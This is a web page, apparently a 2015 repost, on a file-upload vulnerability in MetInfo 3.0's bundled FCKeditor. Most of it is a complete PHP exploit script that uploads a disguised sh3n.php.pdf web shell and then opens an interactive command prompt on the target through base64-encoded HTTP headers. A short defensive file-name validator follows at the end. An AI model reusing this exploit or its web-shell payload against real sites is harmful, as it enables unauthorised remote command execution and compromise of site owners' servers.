
MetInfo 3.0 (FCKeditor) Upload Vulnerability

Source: 自学PHP网    Date: 2015-04-17 15:08


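The MetInfo enterprise website management system is built on PHP + MySQL. It bundles the FCKeditor online editor, and a misconfiguration of that editor allows its upload function to be abused: in some cases, uploading 1.php.pdf yields a shell on the site.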

Exploit:

<?php
/*
MetInfo 3.0 Arbitrary File Upload Exploit
Vulnerable code metinfo.pe/fckeditor/editor/filemanager/connectors/php/upload.php
POC=>metinfo.pe/fckeditor/editor/filemanager/connectors/uploadtest.html
POC=>metinfo.pe/upload
Upload your shell.php.pdf (spoof ext.) will saved into /upload dir.
by sh3n http://guideshen.blogspot.com - @Guide_Shen - http://xsstorm.blogspot.com
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {
  print " [-] No response from {$host}:80 Trying again...";
  $sock = fsockopen($host, 80);
 }
 fputs($sock, $packet);
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 return $resp;
}
print " +------------------------------------------------------------+";
print " |        MetInfo 3.0 File Upload (fckeditor) sh3n            |";
print " +------------------------------------------------------------+ ";
if ($argc < 2)
{
 print " Usage......: php $argv[0] metinfo.pe path";
 print " Example....: php $argv[0] localhost /fckeditor/ ";
 die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--xSsT0rm ";
$data .= "Content-Disposition: form-data; name="NewFile"; filename="sh3n.php.pdf" ";
$data .= "Content-Type: application/octet-stream ";
$data .= "<?php ${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?> ";
$data .= "----xSsT0rm-- ";
$packet = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0 ";
$packet .= "Host: {$host} ";
$packet .= "Content-Length: ".strlen($data)." ";
$packet .= "Content-Type: multipart/form-data; boundary=xSsT0rm ";
$packet .= "Connection: close ";
$packet .= $data;
preg_match("/OnUploadCompleted((.*),"(.*)","(.*)",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die(" [-] Upload failed! (Error {$html[1]}) ");
else print " [-] Shell uploaded to {$html[2]}...have phun! ";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
 print " sh3n-box# ";
 $cmd = trim(fgets(STDIN));
 if ($cmd != "exit")
 {
  $packet = "GET {$path}upload/{$html[3]} HTTP/1.0 ";
  $packet.= "Host: {$host} ";
  $packet.= "Cmd: ".base64_encode($cmd)." ";
  $packet.= "Connection: close ";
  $output = http_send($host, $packet);
  if (eregi("print", $output) || !eregi("_code_", $output)) die(" [-] Exploit failed... ");
  $shell = explode("_code_", $output);
  print " {$shell[1]}";
 }
 else break;
}
?>
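A server-side check that closes the 1.php.pdf case described above, as an added example (not MetInfo or FCKeditor code): it inspects every dot-separated segment of the client file name rather than only the last one, and stores accepted files under a server-generated name. The function names, the allow-list and the list of executable segments are assumptions made for illustration.

```php
<?php
// Added example; not MetInfo or FCKeditor code. All names are hypothetical.
// Assumed allow-list of final extensions the application will store.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];
// Assumed list of segments a web server might hand to an interpreter.
const EXEC_SEGMENT = '/^(php\d?|phtml|phar|pht|cgi|pl|py|asp|aspx|jsp|sh)$/i';

/** Returns null when the client-supplied name is acceptable, else a reason. */
function upload_name_problem(string $clientName): ?string
{
    // Keep only the last path component of whatever the client sent.
    $name = basename(str_replace('\\', '/', $clientName));
    if ($name === '' || strpos($name, "\0") !== false) {
        return 'empty name or NUL byte';
    }
    $parts = explode('.', $name);
    if (count($parts) < 2 || $parts[0] === '') {
        return 'no extension or dotfile';
    }
    $final = strtolower(array_pop($parts));
    if (!in_array($final, ALLOWED_EXT, true)) {
        return "final extension '$final' not allowed";
    }
    // Check every interior segment too: "1.php.pdf" ends in .pdf but
    // still carries a .php segment that some handler mappings honour.
    foreach (array_slice($parts, 1) as $seg) {
        if (preg_match(EXEC_SEGMENT, trim($seg))) {
            return "executable segment '$seg' before final extension";
        }
    }
    return null;
}

/** Server-chosen storage name: random stem plus the validated extension. */
function stored_name(string $clientName): string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names, including the two that appear on this page.
$samples = ['report.pdf', '1.php.pdf', 'sh3n.php.pdf', 'logo.PNG', '.htaccess', 'a.phtml.jpg'];
foreach ($samples as $n) {
    $why = upload_name_problem($n);
    $verdict = ($why === null) ? 'accept -> ' . stored_name($n) : "reject: $why";
    echo str_pad($n, 16), $verdict, PHP_EOL;
}
```

Name validation is one layer; turning off script execution for the upload directory in the web server configuration covers names the check does not anticipate.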
